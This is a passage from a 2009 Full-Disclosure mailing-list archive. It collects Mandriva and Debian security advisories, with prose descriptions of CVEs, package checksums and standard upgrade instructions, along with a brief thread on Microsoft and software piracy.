 ea10f518bb59213ef01857ea4dc0aa4d  
2008.0/x86_64/lib64sasl2-plug-ntlm-2.1.22-23.1mdv2008.0.x86_64.rpm
 63d56373895ddc03a85d4dd3ca1f960a  
2008.0/x86_64/lib64sasl2-plug-otp-2.1.22-23.1mdv2008.0.x86_64.rpm
 4b655bbd94e9693ea9f57811bd0efad3  
2008.0/x86_64/lib64sasl2-plug-plain-2.1.22-23.1mdv2008.0.x86_64.rpm
 5050def960a29e2857cd132785a21143  
2008.0/x86_64/lib64sasl2-plug-sasldb-2.1.22-23.1mdv2008.0.x86_64.rpm
 febdbe8c8c23b096a78ea20dc8ceca75  
2008.0/x86_64/lib64sasl2-plug-sql-2.1.22-23.1mdv2008.0.x86_64.rpm 
 6c88dcfd5ab050abd18f4d2983c79300  
2008.0/SRPMS/cyrus-sasl-2.1.22-23.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.

[Full-disclosure] [ MDVSA-2009:112-1 ] ipsec-tools

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:112-1
 http://www.mandriva.com/security/
 ___

 Package : ipsec-tools
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote
 attackers to cause a denial of service (crash) via crafted fragmented
 packets without a payload, which triggers a NULL pointer dereference
 (CVE-2009-1574).
 
 Updated packages are available that brings ipsec-tools to version
 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous
 bugfixes over the previous 0.7.1 version, and also corrects this
 issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been
 patched to address this issue.
 
 Additionally the flex package required for building ipsec-tools has
 been fixed due to ipsec-tools build problems and is also available
 with this update.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 8256debb7fe84394de70499907060de6  2008.0/i586/flex-2.5.33-2.1mdv2008.0.i586.rpm
 c03c0f9fe8f564ea777b82789ac95f41  
2008.0/i586/ipsec-tools-0.7.2-0.1mdv2008.0.i586.rpm
 9da2195c693a7fe40f7afb3c5806aaca  
2008.0/i586/libipsec0-0.7.2-0.1mdv2008.0.i586.rpm
 29dcc9414a59cba30ce801b9fef416a6  
2008.0/i586/libipsec-devel-0.7.2-0.1mdv2008.0.i586.rpm 
 b3c8a3a36388d02426b77a45d862  2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm
 b0cb7993f29eac3d5f170c7cd3cf0cb5  
2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 36c5d0eb92197c814b90c814d21d3372  
2008.0/x86_64/flex-2.5.33-2.1mdv2008.0.x86_64.rpm
 7a976c988badcb9fae93509acfe99aa2  
2008.0/x86_64/ipsec-tools-0.7.2-0.1mdv2008.0.x86_64.rpm
 85b8ed6e328b048c13eb503bfee8dcdc  
2008.0/x86_64/lib64ipsec0-0.7.2-0.1mdv2008.0.x86_64.rpm
 a22f34f1cfac38c9029eb032e3257285  
2008.0/x86_64/lib64ipsec-devel-0.7.2-0.1mdv2008.0.x86_64.rpm 
 b3c8a3a36388d02426b77a45d862  2008.0/SRPMS/flex-2.5.33-2.1mdv2008.0.src.rpm
 b0cb7993f29eac3d5f170c7cd3cf0cb5  
2008.0/SRPMS/ipsec-tools-0.7.2-0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF9S3mqjQ0CJFipgRAvt/AKDfzDyHHqoCZiMoxKn8Ik2xAqIfsgCfXaCL
6Jl97rfN27eup9AJRmyBBJc=
=2nWo
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:108-1 ] zsh

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:108-1
 http://www.mandriva.com/security/
 ___

 Package : zsh
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 A stack-based buffer overflow was found in the zsh command
 interpreter. An attacker could use this flaw to cause a denial of
 service (zsh crash), when providing a specially-crafted string as
 input to the zsh shell.
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 341fdf8d837fd349186b42db36cb6b5d  2008.0/i586/zsh-4.3.4-4.1mdv2008.0.i586.rpm
 1fe0e1d84da10a334c70a9808d4fffd7  
2008.0/i586/zsh-doc-4.3.4-4.1mdv2008.0.i586.rpm 
 ca28c7f0b98d79f7f7e7e7c93b9afb2e  2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 65c003211e382a0059eb61ec7249bff9  
2008.0/x86_64/zsh-4.3.4-4.1mdv2008.0.x86_64.rpm
 e784e85b82d32d672e56050972f004c2  
2008.0/x86_64/zsh-doc-4.3.4-4.1mdv2008.0.x86_64.rpm 
 ca28c7f0b98d79f7f7e7e7c93b9afb2e  2008.0/SRPMS/zsh-4.3.4-4.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF9FmmqjQ0CJFipgRAtsJAJ9whjyazzRhbx/lOrYjboEuwGHg1ACgvL7V
P4EHVQLhm2xgrmtDNAakr+g=
=xwt6
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:107-1 ] acpid

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:107-1
 http://www.mandriva.com/security/
 ___

 Package : acpid
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 The daemon in acpid before 1.0.10 allows remote attackers to cause a
 denial of service (CPU consumption and connectivity loss) by opening
 a large number of UNIX sockets without closing them, which triggers
 an infinite loop (CVE-2009-0798).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0798
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 5f69d7111e4922e03e2af0c9c790c807  
2008.0/i586/acpid-1.0.6-1.2mdv2008.0.i586.rpm 
 965b27578aeba1ee0a6cd17179ab5ee1  2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 193600a65f75ad4cade617f5e728620d  
2008.0/x86_64/acpid-1.0.6-1.2mdv2008.0.x86_64.rpm 
 965b27578aeba1ee0a6cd17179ab5ee1  2008.0/SRPMS/acpid-1.0.6-1.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF85OmqjQ0CJFipgRAnuyAJ94Oo91sxGRYITeMa/vYuVAOExk/ACeNN0w
EB9qQGIQ6UAsIDZCBoNnxfQ=
=4xFx
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:106-1 ] libwmf

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:106-1
 http://www.mandriva.com/security/
 ___

 Package : libwmf
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Use-after-free vulnerability in the embedded GD library in libwmf
 0.2.8.4 allows context-dependent attackers to cause a denial of service
 (application crash) or possibly execute arbitrary code via a crafted
 WMF file (CVE-2009-1364).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1364
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 e17c0edd7acbe9bb6cf561aa0b85dc0b  
2008.0/i586/libwmf0.2_7-0.2.8.4-14.1mdv2008.0.i586.rpm
 f9dc9d614f9448d3a1495897b9f21be2  
2008.0/i586/libwmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.i586.rpm
 3a2f438e80d47d260bd953fd8ccb2451  
2008.0/i586/libwmf-0.2.8.4-14.1mdv2008.0.i586.rpm 
 7b2f877fc6cb4766dbf77719e2750498  
2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 48865d83944f623fb80e5dd2ea43c46d  
2008.0/x86_64/lib64wmf0.2_7-0.2.8.4-14.1mdv2008.0.x86_64.rpm
 17e8a4121bbb4336d7aeb3ded0c51446  
2008.0/x86_64/lib64wmf0.2_7-devel-0.2.8.4-14.1mdv2008.0.x86_64.rpm
 bc6630356cf5ba7dd6ce7f97f623d034  
2008.0/x86_64/libwmf-0.2.8.4-14.1mdv2008.0.x86_64.rpm 
 7b2f877fc6cb4766dbf77719e2750498  
2008.0/SRPMS/libwmf-0.2.8.4-14.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF8xtmqjQ0CJFipgRAvy0AKDU11NRWuuK8xEj0uy7P46Q4zjdagCg3WtC
yEAYOkzj/+v2POxlwyI/oP4=
=xvCc
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:103-1 ] udev

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:103-1
 http://www.mandriva.com/security/
 ___

 Package : udev
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Security vulnerabilities have been identified and fixed in udev.
 
 udev before 1.4.1 does not verify whether a NETLINK message originates
 from kernel space, which allows local users to gain privileges by
 sending a NETLINK message from user space (CVE-2009-1185).
 
 Buffer overflow in the util_path_encode function in
 udev/lib/libudev-util.c in udev before 1.4.1 allows local users to
 cause a denial of service (service outage) via vectors that trigger
 a call with crafted arguments (CVE-2009-1186).
 
 The updated packages have been patched to prevent this.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 8268a6d9b8b782f008c6bad08081aa1f  
2008.0/i586/libvolume_id0-114-7.1mdv2008.0.i586.rpm
 f25010279ad483a4bd1df3300be1eff5  
2008.0/i586/libvolume_id0-devel-114-7.1mdv2008.0.i586.rpm
 527afa06fad5b28de6ba60c12c5cc685  2008.0/i586/udev-114-7.1mdv2008.0.i586.rpm
 b472ccee86044dba507029b63385e306  
2008.0/i586/udev-doc-114-7.1mdv2008.0.i586.rpm
 33a3aeb9701b9a90b776b08595055f05  
2008.0/i586/udev-tools-114-7.1mdv2008.0.i586.rpm 
 b6057c15bb22b381d07ee45a6bc81974  2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 8e05d00d129d11f2442390ec7dd4174c  
2008.0/x86_64/lib64volume_id0-114-7.1mdv2008.0.x86_64.rpm
 2718c04a037f773bca23b010265071ce  
2008.0/x86_64/lib64volume_id0-devel-114-7.1mdv2008.0.x86_64.rpm
 6756f2bb0dad6dee8188e5dccc1f92cb  
2008.0/x86_64/udev-114-7.1mdv2008.0.x86_64.rpm
 b65a69fde92e29d6affa25d32e881dff  
2008.0/x86_64/udev-doc-114-7.1mdv2008.0.x86_64.rpm
 bf39012f0e457b61fd203711625d78dc  
2008.0/x86_64/udev-tools-114-7.1mdv2008.0.x86_64.rpm 
 b6057c15bb22b381d07ee45a6bc81974  2008.0/SRPMS/udev-114-7.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF8RvmqjQ0CJFipgRAp5ZAJ0YBHRyssp4RsoVDk8awKDSM9mnhACgqeEn
aP7lY4N3P6dafT+v4TzBfgE=
=S27a
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDVSA-2009:197-3 ] nss

2009-12-03 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2009:197-3
 http://www.mandriva.com/security/
 ___

 Package : nss
 Date: December 3, 2009
 Affected: 2008.0
 ___

 Problem Description:

 Security issues in nss prior to 3.12.3 could lead to a
 man-in-the-middle attack via a spoofed X.509 certificate
 (CVE-2009-2408) and md2 algorithm flaws (CVE-2009-2409), and also
 cause a denial-of-service and possible code execution via a long
 domain name in X.509 certificate (CVE-2009-2404).
 
 This update provides the latest versions of NSS and NSPR libraries
 which are not vulnerable to those attacks.

 Update:

 Packages for 2008.0 are being provided due to extended support for
 Corporate products.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2404
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 6aaa636e2160b8b784904273680a8999  
2008.0/i586/libnspr4-4.7.5-0.1mdv2008.0.i586.rpm
 87752fe7629a26066b58aaf8e3509ce9  
2008.0/i586/libnspr-devel-4.7.5-0.1mdv2008.0.i586.rpm
 5950ef5f7750ce69f8505a0d271a654b  
2008.0/i586/libnss3-3.12.3.1-0.1mdv2008.0.i586.rpm
 cb2705cae30e6090947e637d76649cbb  
2008.0/i586/libnss-devel-3.12.3.1-0.1mdv2008.0.i586.rpm
 ceff8722716e8dbada153376cb673239  
2008.0/i586/libnss-static-devel-3.12.3.1-0.1mdv2008.0.i586.rpm
 666ca07f9d4f5ed6e720f033d77c8a00  
2008.0/i586/nss-3.12.3.1-0.1mdv2008.0.i586.rpm 
 1c6c224afbfff232533e68a4a022ae97  2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm
 33cd024a0584b13ddbe39ae1f7e62d46  
2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 be078aecd681468224b73c1c8c920bd9  
2008.0/x86_64/lib64nspr4-4.7.5-0.1mdv2008.0.x86_64.rpm
 41ad25f4383999189cded7c55ed37062  
2008.0/x86_64/lib64nspr-devel-4.7.5-0.1mdv2008.0.x86_64.rpm
 6e3394c9cf3fc81149907518b9b6707b  
2008.0/x86_64/lib64nss3-3.12.3.1-0.1mdv2008.0.x86_64.rpm
 90c5234752f41c6d922c02e83031e5be  
2008.0/x86_64/lib64nss-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm
 5bff6a89fae610df25a8fb6a95224acd  
2008.0/x86_64/lib64nss-static-devel-3.12.3.1-0.1mdv2008.0.x86_64.rpm
 18859c654e9f4c3dfcdd90dcf4da551a  
2008.0/x86_64/nss-3.12.3.1-0.1mdv2008.0.x86_64.rpm 
 1c6c224afbfff232533e68a4a022ae97  2008.0/SRPMS/nspr-4.7.5-0.1mdv2008.0.src.rpm
 33cd024a0584b13ddbe39ae1f7e62d46  
2008.0/SRPMS/nss-3.12.3.1-0.1mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLF64QmqjQ0CJFipgRApgGAJ9TZOgJ09SVNXjOIUwVS+70MDeIswCgw/ER
Rv/NKlCK/9Hv4LvLzZclLM0=
=KTug
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1945-1] New gforge packages fix denial of service

2009-12-03 Thread Steffen Joeris
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1945-1  secur...@debian.org
http://www.debian.org/security/  Steffen Joeris
December 03, 2009 http://www.debian.org/security/faq
- 

Package: gforge
Vulnerability  : symlink attack
Problem type   : local
Debian-specific: no
CVE ID : CVE-2009-3304

Sylvain Beucler discovered that gforge, a collaborative development
tool, is prone to a symlink attack, which allows local users to perform
a denial of service attack by overwriting arbitrary files.


For the stable distribution (lenny), this problem has been fixed in
version 4.7~rc2-7lenny3.

The oldstable distribution (etch), this problem has been fixed in
version 4.5.14-22etch13.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 4.8.2-1.


We recommend that you upgrade your gforge packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.dsc
Size/MD5 checksum:  953 a170b517b1d68ca0ad53a1b8b03c3317
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14.orig.tar.gz
Size/MD5 checksum:  2161141 e85f82eff84ee073f80a2a52dd32c8a5
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13.diff.gz
Size/MD5 checksum:   204328 33081d2f6a0056b31091360db3002a9f

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-ldap_4.5.14-22etch13_all.deb
Size/MD5 checksum:86628 c6b62116a819fa905acae8df867d
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-common_4.5.14-22etch13_all.deb
Size/MD5 checksum:  1012268 78dfb2931853c3f89d233cc9510199f2
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-db-postgresql_4.5.14-22etch13_all.deb
Size/MD5 checksum:   212786 1bc973b449b07020fbef4519fc8e074e
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-web-apache_4.5.14-22etch13_all.deb
Size/MD5 checksum:   705446 286aba34673375cb8763765fd241d791
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-ftp-proftpd_4.5.14-22etch13_all.deb
Size/MD5 checksum:86344 394f14f010e9de88145cc3251e7e8982
  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.5.14-22etch13_all.deb
Size/MD5 checksum:80562 52133da4596347d8c05e37643a959435
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-postfix_4.5.14-22etch13_all.deb
Size/MD5 checksum:88808 72ad3b9f7d9d1f8732551a99b5e74471
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-courier_4.5.14-22etch13_all.deb
Size/MD5 checksum:76368 c7ba219bac6560994c07dfb639801c99
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim4_4.5.14-22etch13_all.deb
Size/MD5 checksum:89414 095ca81a4671193cd5d822e967d36684
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-shell-postgresql_4.5.14-22etch13_all.deb
Size/MD5 checksum:87434 8d960c7671eac2a480a43cd948a98d7d
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-mta-exim_4.5.14-22etch13_all.deb
Size/MD5 checksum:88904 8d3692ecc555ca40558d50333bf543a9
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-lists-mailman_4.5.14-22etch13_all.deb
Size/MD5 checksum:82386 3bc6d055f6eb74edfd23ca8dbfb8fa3e
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-ldap-openldap_4.5.14-22etch13_all.deb
Size/MD5 checksum:95738 beee5393efe02def8071a78a3707244c
  
http://security.debian.org/pool/updates/main/g/gforge/gforge-dns-bind9_4.5.14-22etch13_all.deb
Size/MD5 checksum:   104062 a70e01f8055201519b14718555023abb


Debian GNU/Linux 5.0 alias lenny
- 

Debian (stable)
- ---

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/g/gforge/gforge_4.7~rc2-7lenny3.diff.gz
Size/MD5 checksum:   106204 cd0b909a3d

Re: [Full-disclosure] Microsoft: ‘Piracy no long er poses a threat to us’

2009-12-03 Thread Maky Pevnser
The big deal for Microsoft are the agreements with Acer/HP/Compaq/Dell etc for 
the "embedded" OS license and pre-installation.
Since Vista the final user is no longer the main Microsoft's target.
Plus the top 500 Fortune companies using corporate agreements, the Government 
Agencies, the International firms.
Final user is merely considered, by Microsoft, an extra... 

On Dec 3, 2009, at 6:24 AM, Ivan . wrote:

> In a recent interview, managing director of Microsoft Philippines Inc., John 
> Bessey, has claimed that piracy no longer poses a threat to the software 
> giant.
> 
> http://freakbits.com/microsoft-piracy-no-longer-poses-a-threat-to-us-1202
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1944-1] New request-tracker packages fix session hijack vulnerability

2009-12-03 Thread Steffen Joeris
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1944-1  secur...@debian.org
http://www.debian.org/security/  Steffen Joeris
December 03, 2009 http://www.debian.org/security/faq
- 

Package: request-tracker3.4/request-tracker3.6
Vulnerability  : session hijack
Problem type   : remote
Debian-specific: no
CVE Id : CVE-2009-3585


Mikal Gule discovered that request-tracker, an extensible trouble-ticket
tracking system, is prone to an attack, where an attacker with access
to the same domain can hijack a user's RT session.


For the stable distribution (lenny), this problem has been fixed in
version 3.6.7-5+lenny3.

For the oldstable distribution (etch), this problem has been fixed in
version 3.6.1-4+etch1 of request-tracker3.6 and version 3.4.5-2+etch1
of request-tracker3.4.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 3.6.9-2.

We recommend that you upgrade your request-tracker packages.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.diff.gz
Size/MD5 checksum:24450 41891b8a012e671b706facdf4ece3402
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.diff.gz
Size/MD5 checksum:23488 3c3914d16ad3e719cd502e2490561cc0
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1.dsc
Size/MD5 checksum:  916 c03c1972b5ccab3574f9dfdd3fec0bee
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1.dsc
Size/MD5 checksum:  876 5a18cf29db217c6fd2265f6923a938cb
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5.orig.tar.gz
Size/MD5 checksum:  1410154 16c8007cba54669e6c9de95cfc680b2a
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1.orig.tar.gz
Size/MD5 checksum:  1545708 40c5a828fadaeef9e150255a517d0b17

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache2_3.6.1-4+etch1_all.deb
Size/MD5 checksum:   118264 318517b3d5539a84dee1639710048d92
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-apache_3.6.1-4+etch1_all.deb
Size/MD5 checksum:   117786 6f3da07edc9499cc282ceed8e71cf26d
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-clients_3.4.5-2+etch1_all.deb
Size/MD5 checksum:   120578 e404452bd2f912820644b26c72de
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/request-tracker3.4_3.4.5-2+etch1_all.deb
Size/MD5 checksum:  1198788 9af1648e53a722155dfd9acaaaf364cd
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache_3.4.5-2+etch1_all.deb
Size/MD5 checksum:92002 009fe1090c6142409210f3304f63240d
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/request-tracker3.6_3.6.1-4+etch1_all.deb
Size/MD5 checksum:  1315556 9a06544261bd4b7800ae89065d4f4317
  
http://security.debian.org/pool/updates/main/r/request-tracker3.6/rt3.6-clients_3.6.1-4+etch1_all.deb
Size/MD5 checksum:   146902 8c4a83429ef704025849373a24cf06d5
  
http://security.debian.org/pool/updates/main/r/request-tracker3.4/rt3.4-apache2_3.4.5-2+etch1_all.deb
Size/MD5 checksum:92402 2737f376b27e6c3087dd355e5977edb5

